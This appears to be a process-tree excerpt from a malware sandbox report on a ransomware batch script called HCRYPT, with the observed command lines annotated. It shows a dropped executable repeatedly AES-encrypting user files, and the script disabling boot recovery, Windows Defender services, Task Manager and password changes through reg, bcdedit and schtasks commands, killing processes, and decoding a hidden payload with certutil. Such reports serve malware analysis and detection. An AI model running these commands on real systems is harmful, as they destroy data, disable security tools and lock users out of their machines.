C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c findstr /b "25:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"4⤵
-
C:\Windows\system32\findstr.exefindstr /b "25:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"5⤵
-
C:\Windows\system32\attrib.exeAttrib +h +s "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{77f0c28d-428a-4d18-9971-22926bfdcd25}\0.1.filtertrie.intermediate.txt"4⤵
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\System.exeSystem.exe --encrypt --file="C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{77f0c28d-428a-4d18-9971-22926bfdcd25}\0.1.filtertrie.intermediate.txt" --pass=7962089087181755926211401126974224811160328267 --algo=AES-2564⤵
- Executes dropped EXE
-
C:\Windows\system32\attrib.exeAttrib -h -s "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{77f0c28d-428a-4d18-9971-22926bfdcd25}\0.1.filtertrie.intermediate.txt"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c findstr /b "26:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"4⤵
-
C:\Windows\system32\findstr.exefindstr /b "26:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"5⤵
-
C:\Windows\system32\attrib.exeAttrib +h +s "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{77f0c28d-428a-4d18-9971-22926bfdcd25}\0.2.filtertrie.intermediate.txt"4⤵
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\System.exeSystem.exe --encrypt --file="C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{77f0c28d-428a-4d18-9971-22926bfdcd25}\0.2.filtertrie.intermediate.txt" --pass=7962089087181755926211401126974224811160328267 --algo=AES-2564⤵
- Executes dropped EXE
-
C:\Windows\system32\attrib.exeAttrib -h -s "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{77f0c28d-428a-4d18-9971-22926bfdcd25}\0.2.filtertrie.intermediate.txt"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c findstr /b "27:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"4⤵
-
C:\Windows\system32\findstr.exefindstr /b "27:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"5⤵
-
C:\Windows\system32\attrib.exeAttrib +h +s "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{afbd157e-d802-4aa8-932a-26539303defc}\0.0.filtertrie.intermediate.txt"4⤵
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\System.exeSystem.exe --encrypt --file="C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{afbd157e-d802-4aa8-932a-26539303defc}\0.0.filtertrie.intermediate.txt" --pass=7962089087181755926211401126974224811160328267 --algo=AES-2564⤵
- Executes dropped EXE
-
C:\Windows\system32\attrib.exeAttrib -h -s "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{afbd157e-d802-4aa8-932a-26539303defc}\0.0.filtertrie.intermediate.txt"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c findstr /b "28:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"4⤵
-
C:\Windows\system32\findstr.exefindstr /b "28:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"5⤵
-
C:\Windows\system32\attrib.exeAttrib +h +s "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{afbd157e-d802-4aa8-932a-26539303defc}\0.1.filtertrie.intermediate.txt"4⤵
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\System.exeSystem.exe --encrypt --file="C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{afbd157e-d802-4aa8-932a-26539303defc}\0.1.filtertrie.intermediate.txt" --pass=7962089087181755926211401126974224811160328267 --algo=AES-2564⤵
- Executes dropped EXE
-
C:\Windows\system32\attrib.exeAttrib -h -s "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{afbd157e-d802-4aa8-932a-26539303defc}\0.1.filtertrie.intermediate.txt"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c findstr /b "29:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"4⤵
-
C:\Windows\system32\findstr.exefindstr /b "29:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"5⤵
-
C:\Windows\system32\attrib.exeAttrib +h +s "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{afbd157e-d802-4aa8-932a-26539303defc}\0.2.filtertrie.intermediate.txt"4⤵
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\System.exeSystem.exe --encrypt --file="C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{afbd157e-d802-4aa8-932a-26539303defc}\0.2.filtertrie.intermediate.txt" --pass=7962089087181755926211401126974224811160328267 --algo=AES-2564⤵
- Executes dropped EXE
-
C:\Windows\system32\attrib.exeAttrib -h -s "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{afbd157e-d802-4aa8-932a-26539303defc}\0.2.filtertrie.intermediate.txt"4⤵
- Views/modifies file attributes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c findstr /b "30:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"4⤵
-
C:\Windows\system32\findstr.exefindstr /b "30:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"5⤵
-
C:\Windows\system32\attrib.exeAttrib +h +s "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{afbd157e-d802-4aa8-932a-26539303defc}\0.2.filtertrie.intermediate.txt"4⤵
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\System.exeSystem.exe --encrypt --file="C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{afbd157e-d802-4aa8-932a-26539303defc}\0.2.filtertrie.intermediate.txt" --pass=7962089087181755926211401126974224811160328267 --algo=AES-2564⤵
- Executes dropped EXE
-
C:\Windows\system32\attrib.exeAttrib -h -s "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{afbd157e-d802-4aa8-932a-26539303defc}\0.2.filtertrie.intermediate.txt"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c findstr /b "31:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"4⤵
-
C:\Windows\system32\findstr.exefindstr /b "31:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"5⤵
-
C:\Windows\system32\attrib.exeAttrib +h +s "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{afbd157e-d802-4aa8-932a-26539303defc}\0.2.filtertrie.intermediate.txt"4⤵
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\System.exeSystem.exe --encrypt --file="C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{afbd157e-d802-4aa8-932a-26539303defc}\0.2.filtertrie.intermediate.txt" --pass=7962089087181755926211401126974224811160328267 --algo=AES-2564⤵
- Executes dropped EXE
-
C:\Windows\system32\attrib.exeAttrib -h -s "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{afbd157e-d802-4aa8-932a-26539303defc}\0.2.filtertrie.intermediate.txt"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c findstr /b "32:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"4⤵
-
C:\Windows\system32\findstr.exefindstr /b "32:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"5⤵
-
C:\Windows\system32\attrib.exeAttrib +h +s "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{afbd157e-d802-4aa8-932a-26539303defc}\0.2.filtertrie.intermediate.txt"4⤵
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\System.exeSystem.exe --encrypt --file="C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{afbd157e-d802-4aa8-932a-26539303defc}\0.2.filtertrie.intermediate.txt" --pass=7962089087181755926211401126974224811160328267 --algo=AES-2564⤵
- Executes dropped EXE
-
C:\Windows\system32\attrib.exeAttrib -h -s "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{afbd157e-d802-4aa8-932a-26539303defc}\0.2.filtertrie.intermediate.txt"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c findstr /b "33:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"4⤵
-
C:\Windows\system32\findstr.exefindstr /b "33:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"5⤵
-
C:\Windows\system32\attrib.exeAttrib +h +s "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{afbd157e-d802-4aa8-932a-26539303defc}\0.2.filtertrie.intermediate.txt"4⤵
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\System.exeSystem.exe --encrypt --file="C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{afbd157e-d802-4aa8-932a-26539303defc}\0.2.filtertrie.intermediate.txt" --pass=7962089087181755926211401126974224811160328267 --algo=AES-2564⤵
- Executes dropped EXE
-
C:\Windows\system32\attrib.exeAttrib -h -s "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{afbd157e-d802-4aa8-932a-26539303defc}\0.2.filtertrie.intermediate.txt"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c findstr /b "34:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"4⤵
-
C:\Windows\system32\findstr.exefindstr /b "34:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"5⤵
-
C:\Windows\system32\attrib.exeAttrib +h +s "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{afbd157e-d802-4aa8-932a-26539303defc}\0.2.filtertrie.intermediate.txt"4⤵
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\System.exeSystem.exe --encrypt --file="C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{afbd157e-d802-4aa8-932a-26539303defc}\0.2.filtertrie.intermediate.txt" --pass=7962089087181755926211401126974224811160328267 --algo=AES-2564⤵
- Executes dropped EXE
-
C:\Windows\system32\attrib.exeAttrib -h -s "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{afbd157e-d802-4aa8-932a-26539303defc}\0.2.filtertrie.intermediate.txt"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c findstr /b "35:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"4⤵
-
C:\Windows\system32\findstr.exefindstr /b "35:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"5⤵
-
C:\Windows\system32\attrib.exeAttrib +h +s "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{afbd157e-d802-4aa8-932a-26539303defc}\0.2.filtertrie.intermediate.txt"4⤵
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\System.exeSystem.exe --encrypt --file="C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{afbd157e-d802-4aa8-932a-26539303defc}\0.2.filtertrie.intermediate.txt" --pass=7962089087181755926211401126974224811160328267 --algo=AES-2564⤵
- Executes dropped EXE
-
C:\Windows\system32\attrib.exeAttrib -h -s "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{afbd157e-d802-4aa8-932a-26539303defc}\0.2.filtertrie.intermediate.txt"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c findstr /b "36:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"4⤵
-
C:\Windows\system32\findstr.exefindstr /b "36:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"5⤵
-
C:\Windows\system32\attrib.exeAttrib +h +s "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133596449549740872.txt"4⤵
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\System.exeSystem.exe --encrypt --file="C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133596449549740872.txt" --pass=7962089087181755926211401126974224811160328267 --algo=AES-2564⤵
- Executes dropped EXE
-
C:\Windows\system32\attrib.exeAttrib -h -s "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133596449549740872.txt"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c findstr /b "37:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"4⤵
-
C:\Windows\system32\findstr.exefindstr /b "37:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"5⤵
-
C:\Windows\system32\attrib.exeAttrib +h +s "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133596476189409161.txt"4⤵
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\System.exeSystem.exe --encrypt --file="C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133596476189409161.txt" --pass=7962089087181755926211401126974224811160328267 --algo=AES-2564⤵
- Executes dropped EXE
-
C:\Windows\system32\attrib.exeAttrib -h -s "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133596476189409161.txt"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c findstr /b "38:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"4⤵
-
C:\Windows\system32\findstr.exefindstr /b "38:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"5⤵
-
C:\Windows\system32\attrib.exeAttrib +h +s "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133596479198051286.txt"4⤵
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\System.exeSystem.exe --encrypt --file="C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133596479198051286.txt" --pass=7962089087181755926211401126974224811160328267 --algo=AES-2564⤵
- Executes dropped EXE
-
C:\Windows\system32\attrib.exeAttrib -h -s "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133596479198051286.txt"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c findstr /b "39:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"4⤵
-
C:\Windows\system32\findstr.exefindstr /b "39:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"5⤵
-
C:\Windows\system32\attrib.exeAttrib +h +s "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133611139078670138.txt"4⤵
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\System.exeSystem.exe --encrypt --file="C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133611139078670138.txt" --pass=7962089087181755926211401126974224811160328267 --algo=AES-2564⤵
- Executes dropped EXE
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\cmd.txt1⤵
- Opens file in notepad (likely ransom note)
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=60 --field-trial-handle=7728,i,16710585221322798697,8586257254049248207,262144 --variations-seed-version --mojo-platform-channel-handle=8232 /prefetch:11⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\124.0.2478.80\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\124.0.2478.80\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=8148,i,16710585221322798697,8586257254049248207,262144 --variations-seed-version --mojo-platform-channel-handle=7856 /prefetch:81⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\124.0.2478.80\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\124.0.2478.80\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=8148,i,16710585221322798697,8586257254049248207,262144 --variations-seed-version --mojo-platform-channel-handle=7856 /prefetch:81⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=62 --field-trial-handle=3456,i,16710585221322798697,8586257254049248207,262144 --variations-seed-version --mojo-platform-channel-handle=9204 /prefetch:11⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=9176,i,16710585221322798697,8586257254049248207,262144 --variations-seed-version --mojo-platform-channel-handle=6348 /prefetch:81⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\Desktop\HCRYPT_v1.2.0_stable.bat"1⤵
- Checks computer location settings
- Modifies registry class
-
C:\Windows\system32\chcp.comchcp 650012⤵
-
C:\Windows\system32\fsutil.exefsutil dirty query C:2⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\vbscript.vbs"2⤵
- Checks computer location settings
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\HCRYPT_v1.2.0_stable.bat" "3⤵
-
C:\Windows\system32\chcp.comchcp 650014⤵
-
C:\Windows\system32\fsutil.exefsutil dirty query C:4⤵
-
C:\Windows\system32\msg.exemsg * ⚠️ File failed to run correctly (Process aborted)4⤵
-
C:\Windows\system32\cmd.execmd /c exit 1154⤵
-
C:\Windows\system32\attrib.exeAttrib +h +s +r "C:\Users\Admin\Desktop\HCRYPT_v1.2.0_stable.bat"4⤵
-
C:\Windows\system32\bcdedit.exebcdedit /set recoveryenabled No4⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\bcdedit.exebcdedit /set bootstatuspolicy ignoreallfailures4⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f4⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f4⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f4⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f4⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v HideFastUserSwitching /t REG_DWORD /d 1 /f4⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f4⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.Update" /v "Enabled" /t REG_DWORD /d 0 /f4⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f4⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f4⤵
- Modifies Windows Defender Real-time Protection settings
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f4⤵
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f4⤵
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f4⤵
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f4⤵
- Modifies Windows Defender Real-time Protection settings
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f4⤵
- Modifies Windows Defender Real-time Protection settings
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f4⤵
- Modifies Windows Defender Real-time Protection settings
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f4⤵
- Modifies Windows Defender Real-time Protection settings
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f4⤵
- Modifies Windows Defender Real-time Protection settings
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f4⤵
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f4⤵
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f4⤵
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f4⤵
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f4⤵
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f4⤵
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable4⤵
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable4⤵
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable4⤵
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable4⤵
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable4⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f4⤵
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f4⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f4⤵
-
C:\Windows\system32\reg.exereg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f4⤵
-
C:\Windows\system32\reg.exereg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f4⤵
-
C:\Windows\system32\reg.exereg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f4⤵
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f4⤵
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f4⤵
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f4⤵
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f4⤵
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f4⤵
- Modifies security service
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f4⤵
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\Sense" /v "Start" /t REG_DWORD /d "4" /f4⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f4⤵
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters4⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /IM chrome.exe4⤵
- Kills process with taskkill
-
C:\Windows\system32\taskkill.exetaskkill /F /IM taskmgr.exe4⤵
- Kills process with taskkill
-
C:\Windows\system32\timeout.exetimeout 2 /nobreak4⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\certutil.execertutil -decode cmd.txt "C:\Users\Admin/3D Objects/6669236902340911607.cmd"4⤵
-
C:\Windows\system32\timeout.exetimeout 2 /nobreak4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin/3D Objects/6669236902340911607.cmd"4⤵
-
C:\Windows\system32\cscript.execscript CS2.vbs4⤵
- Drops startup file
-
